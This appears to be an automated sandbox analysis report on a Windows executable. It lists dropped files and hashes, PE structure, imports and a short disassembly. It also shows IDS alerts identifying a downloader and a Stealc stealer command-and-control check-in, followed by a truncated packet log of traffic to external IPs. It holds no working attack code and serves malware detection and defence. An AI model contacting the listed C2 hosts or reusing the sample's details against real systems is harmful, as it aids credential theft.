                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.4.0.<./.P.i.
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):4565
                                                                                Entropy (8bit):4.445985306585534
                                                                                Encrypted:false
                                                                                SSDEEP:48:cvIwWl8zspJg77aI98YSWpW8VYGYm8M4JtGF6+q8iQ8kY/ad:uIjf7I7CYz7VqJTYA/ad
                                                                                MD5:B0817611B7B570CFA26C4CFDDB122458
                                                                                SHA1:FFE5107E805FE0F18A84C36BC8B2F7E3ADDCC033
                                                                                SHA-256:2B341DF5633E0787D0D09E219B63702113E63285D9066E5C693AECD6F2ABB75B
                                                                                SHA-512:41C3264B71CFA3E94EE57A39EE9E625572A76C3269B27FBE5DD607FD505891C811E90731E9342470DCBCA1519FD0747BF49E5C13A33D51ECDFD60799AD1ADC87
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560651" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                Process:C:\Users\user\Desktop\TP77MvSzt2.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):402432
                                                                                Entropy (8bit):6.631084505190823
                                                                                Encrypted:false
                                                                                SSDEEP:6144:r62/aT+zPGv8YxsI111cAz/LslwcxJm4tEyUonhvxFo:KT+zGvxNcAPCwGJptEyUg5
                                                                                MD5:8107C38AF897D81AA4BFE8CE9CA8407C
                                                                                SHA1:75F7B1895BD97B6CFCB9AA0C5E83DE9FB424CBB0
                                                                                SHA-256:5AC2F02DAE8B85F730B17D9D8C2CB51DFDB7046713C65AE72B0CF47E16A1C9A5
                                                                                SHA-512:1B4A0DF730AE0912CF3CF18E1210644D3EA804B5F0569997284F04CEDFDAB86075C7BA41313ED83F9B998F7ACE6BBF50CBCA052849AEE73400592951B4D3992A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Reputation:low
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K......X...X...X..pX...X..bX...X..sX...X..eXd..X(].X...X...Xt..X..lX...X..rX...X..wX...XRich...X................PE..L...../f.....................8....................@...........................&.....[8..........................................<....................................................................................................................text............................... ..`.rdata...%.......&..................@..@.data...x........L..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\TP77MvSzt2.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):402432
                                                                                Entropy (8bit):6.631084505190823
                                                                                Encrypted:false
                                                                                SSDEEP:6144:r62/aT+zPGv8YxsI111cAz/LslwcxJm4tEyUonhvxFo:KT+zGvxNcAPCwGJptEyUg5
                                                                                MD5:8107C38AF897D81AA4BFE8CE9CA8407C
                                                                                SHA1:75F7B1895BD97B6CFCB9AA0C5E83DE9FB424CBB0
                                                                                SHA-256:5AC2F02DAE8B85F730B17D9D8C2CB51DFDB7046713C65AE72B0CF47E16A1C9A5
                                                                                SHA-512:1B4A0DF730AE0912CF3CF18E1210644D3EA804B5F0569997284F04CEDFDAB86075C7BA41313ED83F9B998F7ACE6BBF50CBCA052849AEE73400592951B4D3992A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Reputation:low
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K......X...X...X..pX...X..bX...X..sX...X..eXd..X(].X...X...Xt..X..lX...X..rX...X..wX...XRich...X................PE..L...../f.....................8....................@...........................&.....[8..........................................<....................................................................................................................text............................... ..`.rdata...%.......&..................@..@.data...x........L..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):1835008
                                                                                Entropy (8bit):4.465483530354323
                                                                                Encrypted:false
                                                                                SSDEEP:6144:DIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNwdwBCswSb7:UXD94+WlLZMM6YFH2+7
                                                                                MD5:CEF0AB6A7C0475C1F1A571BF68781F00
                                                                                SHA1:74367225A1F161A20F3D88EA20E150CA18C2CEF8
                                                                                SHA-256:2FC940B8C19CB7D644DBA575854CC85CCE5CE9D4D2E06373E827A16AEC60E997
                                                                                SHA-512:F666AEA9D6E78CE991DE24418E41890D9722A7D6843A4F0A4BB2F66012DD4D040D74487FC9855E450C2CA8D86682A80BD25C0085EC902B585E91C620E5E04C71
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmz$..'.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):6.976895712780285
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                • InstallShield setup (43055/19) 0.43%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:TP77MvSzt2.exe
                                                                                File size:466'944 bytes
                                                                                MD5:1e1e32d1eedb37a1e3c1ad488621b26f
                                                                                SHA1:3896ddcb3211b9412fac2490687bdc0c1d609cc1
                                                                                SHA256:c5fd02988cb7a5430c4542227ccc37e121f586ee671060f1428262af5477c319
                                                                                SHA512:ef7a425f3f32ded6f85914e955a30dd592303d659be776d25dfec6e9abd16d744b4cc4defdb39b29049be49e3f55aa3d226d27825b40971b68f0cb0fdba7acb5
                                                                                SSDEEP:6144:eL54ENEIRSlujmOaY/8qXPxQeYTXxMionfhO6Mo:emEN7SlPY//XvumiU
                                                                                TLSH:74A49D2161F16916EE776B314E3B96ECE66FBC12EE3C565DA1143E0F09733B18622702
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4.c.U.0.U.0.U.0E.@0.U.0..R0.U.0..C0.U.0..U0.U.0...0.U.0.U.0.U.0..\0.U.0..B0.U.0..G0.U.0Rich.U.0........................PE..L..
                                                                                Icon Hash:46c7c30b0f4e0d99
                                                                                Entrypoint:0x40171e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x659105B1 [Sun Dec 31 06:09:53 2023 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:0
                                                                                File Version Major:5
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:9eb5b29baf071d2c96e57b7e9a18e804
                                                                                Instruction
                                                                                call 00007F2CF4FAEB3Eh
                                                                                jmp 00007F2CF4FAB61Eh
                                                                                mov edi, edi
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 00000328h
                                                                                mov dword ptr [00450480h], eax
                                                                                mov dword ptr [0045047Ch], ecx
                                                                                mov dword ptr [00450478h], edx
                                                                                mov dword ptr [00450474h], ebx
                                                                                mov dword ptr [00450470h], esi
                                                                                mov dword ptr [0045046Ch], edi
                                                                                mov word ptr [00450498h], ss
                                                                                mov word ptr [0045048Ch], cs
                                                                                mov word ptr [00450468h], ds
                                                                                mov word ptr [00450464h], es
                                                                                mov word ptr [00450460h], fs
                                                                                mov word ptr [0045045Ch], gs
                                                                                pushfd
                                                                                pop dword ptr [00450490h]
                                                                                mov eax, dword ptr [ebp+00h]
                                                                                mov dword ptr [00450484h], eax
                                                                                mov eax, dword ptr [ebp+04h]
                                                                                mov dword ptr [00450488h], eax
                                                                                lea eax, dword ptr [ebp+08h]
                                                                                mov dword ptr [00450494h], eax
                                                                                mov eax, dword ptr [ebp-00000320h]
                                                                                mov dword ptr [004503D0h], 00010001h
                                                                                mov eax, dword ptr [00450488h]
                                                                                mov dword ptr [00450384h], eax
                                                                                mov dword ptr [00450378h], C0000409h
                                                                                mov dword ptr [0045037Ch], 00000001h
                                                                                mov eax, dword ptr [0044F004h]
                                                                                mov dword ptr [ebp-00000328h], eax
                                                                                mov eax, dword ptr [0044F008h]
                                                                                mov dword ptr [ebp-00000324h], eax
                                                                                call dword ptr [000000ECh]
                                                                                Programming Language:
                                                                                • [C++] VS2008 build 21022
                                                                                • [ASM] VS2008 build 21022
                                                                                • [ C ] VS2008 build 21022
                                                                                • [IMP] VS2005 build 50727
                                                                                • [RES] VS2008 build 21022
                                                                                • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
---- | --------------- | ------------ | -------------
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4db5c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2756000 | 0x20570 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4d720 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4c000 | 0x1b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
---- | --------------- | ------------ | -------- | --- | -------- | --------------- | --------- | ------- | ---------------
.text | 0x1000 | 0x4a240 | 0x4a400 | 2d1157276e3340c143a17370f1ec5df8 | False | 0.8783505629208754 | data | 7.6648823522119836 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x4c000 | 0x2522 | 0x2600 | 47e1827876a4808bbc1f593829a8b4ca | False | 0.37664473684210525 | data | 5.4418142455755465 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4f000 | 0x270117c | 0x1400 | 71e359b618477ba3f80481f9a387c38c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.sohumi | 0x2751000 | 0x4400 | 0x3800 | b211778b80f6d441b6cf61ada776fc6d | False | 0.0025809151785714285 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2756000 | 0x20570 | 0x20600 | 49c78165715957bff58d4582683b0712 | False | 0.4798503861003861 | data | 5.409133270486441 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x276e660 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.7368421052631579
RT_CURSOR | 0x276e790 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.06130705394190871
RT_ICON | 0x2756b10 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.5565031982942431
RT_ICON | 0x27579b8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.6304151624548736
RT_ICON | 0x2758260 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.6762672811059908
RT_ICON | 0x2758928 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.736271676300578
RT_ICON | 0x2758e90 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.5033195020746888
RT_ICON | 0x275b438 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.5968574108818011
RT_ICON | 0x275c4e0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.5926229508196721
RT_ICON | 0x275ce68 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.7331560283687943
RT_ICON | 0x275d348 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.3358208955223881
RT_ICON | 0x275e1f0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.39395306859205775
RT_ICON | 0x275ea98 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.3957373271889401
RT_ICON | 0x275f160 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.4060693641618497
RT_ICON | 0x275f6c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Turkish | Turkey | 0.22095435684647302
RT_ICON | 0x2761c70 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Turkish | Turkey | 0.24835834896810507
RT_ICON | 0x2762d18 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Turkish | Turkey | 0.28647540983606556
RT_ICON | 0x27636a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Turkish | Turkey | 0.3147163120567376
RT_ICON | 0x2763b80 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.39019189765458423
RT_ICON | 0x2764a28 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.5464801444043321
RT_ICON | 0x27652d0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.6094470046082949
RT_ICON | 0x2765998 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.6401734104046243
RT_ICON | 0x2765f00 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkish | Turkey | 0.4101782363977486
RT_ICON | 0x2766fa8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.39959016393442626
RT_ICON | 0x2767930 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.44858156028368795
RT_ICON | 0x2767e00 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.8275586353944563
RT_ICON | 0x2768ca8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.8664259927797834
RT_ICON | 0x2769550 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.7793778801843319
RT_ICON | 0x2769c18 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.7521676300578035
RT_ICON | 0x276a180 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.8062240663900415
RT_ICON | 0x276c728 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.8341932457786116
RT_ICON | 0x276d7d0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.8434426229508196
RT_ICON | 0x276e158 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.8634751773049646
RT_STRING | 0x2770f10 | 0x9a | data | | | 0.6038961038961039
RT_STRING | 0x2770fb0 | 0x6da | data | | | 0.4264538198403649
RT_STRING | 0x2771690 | 0x4aa | data | | | 0.4455611390284757
RT_STRING | 0x2771b40 | 0x4dc | data | | | 0.4429260450160772
RT_STRING | 0x2772020 | 0x7d4 | data | | | 0.41966067864271456
RT_STRING | 0x27727f8 | 0x718 | data | | | 0.42841409691629956
RT_STRING | 0x2772f10 | 0x696 | data | | | 0.4359430604982206
RT_STRING | 0x27735a8 | 0x616 | data | | | 0.43902439024390244
RT_STRING | 0x2773bc0 | 0x7de | data | | | 0.41807348560079444
RT_STRING | 0x27743a0 | 0x5c6 | data | | | 0.4370771312584574
RT_STRING | 0x2774968 | 0x5d8 | data | | | 0.44385026737967914
RT_STRING | 0x2774f40 | 0x588 | data | | | 0.4392655367231638
RT_STRING | 0x27754c8 | 0x616 | data | | | 0.43838254172015406
RT_STRING | 0x2775ae0 | 0x4ee | data | | | 0.4548335974643423
RT_STRING | 0x2775fd0 | 0x5a0 | data | | | 0.4354166666666667
RT_ACCELERATOR | 0x276e638 | 0x28 | data | | | 1.025
RT_GROUP_CURSOR | 0x2770d38 | 0x22 | data | | | 1.0588235294117647
RT_GROUP_ICON | 0x276e5c0 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
RT_GROUP_ICON | 0x275d2d0 | 0x76 | data | Turkish | Turkey | 0.6610169491525424
RT_GROUP_ICON | 0x2767d98 | 0x68 | data | Turkish | Turkey | 0.7211538461538461
RT_GROUP_ICON | 0x2763b08 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
RT_VERSION | 0x2770d60 | 0x1b0 | data | | | 0.5856481481481481
DLL | Import
KERNEL32.dll | GetComputerNameA, GetNumaNodeProcessorMask, GetNumaProcessorNode, GetLocaleInfoA, CallNamedPipeA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, GlobalFlags, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, GetFileAttributesW, GetBinaryTypeA, GetModuleFileNameW, GetConsoleFontSize, IsBadStringPtrA, WritePrivateProfileStringW, GetStringTypeExA, LCMapStringA, GetStdHandle, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, MoveFileA, SetCommMask, GetOEMCP, BuildCommDCBA, FatalAppExitA, FindAtomW, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, CloseHandle, WriteConsoleW, MultiByteToWideChar, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedDecrement, GetACP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, HeapSize, FreeEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, LCMapStringW, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CreateFileA
WINHTTP.dll | WinHttpOpenRequest
Language of compilation system | Country where language is spoken | Map
Turkish | Turkey |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-26T19:08:22.376374+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 104.21.56.70 | 443 | TCP
2024-10-26T19:08:23.474770+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 176.113.115.37 | 80 | TCP
2024-10-26T19:08:34.605219+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49732 | 62.204.41.177 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                Oct 26, 2024 19:08:23.862761021 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.862812996 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.862938881 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.862974882 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.862991095 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.863012075 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.863018990 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.863051891 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.863399029 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.863449097 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.887039900 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.887099028 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.887132883 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.887134075 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.887180090 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.887180090 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.980688095 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.980746031 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.980777025 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.980798006 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.980833054 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.980868101 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.980879068 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.980879068 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.980879068 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.980911016 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.980918884 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.980962992 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.100745916 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.100824118 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.100826025 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.100847960 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.100864887 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.100872040 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.100879908 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.100881100 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.100898981 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.100898981 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.100914955 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.100915909 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.100939035 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.100954056 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.101051092 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.101093054 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.101111889 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.101128101 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.101145983 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.101155996 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.101156950 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.101171970 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.101175070 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.101182938 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.101195097 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.101233959 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.102066040 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.102149010 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.102283001 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.102296114 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.102308989 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.102322102 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.102329016 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.102336884 CEST8049731176.113.115.37192.168.2.4
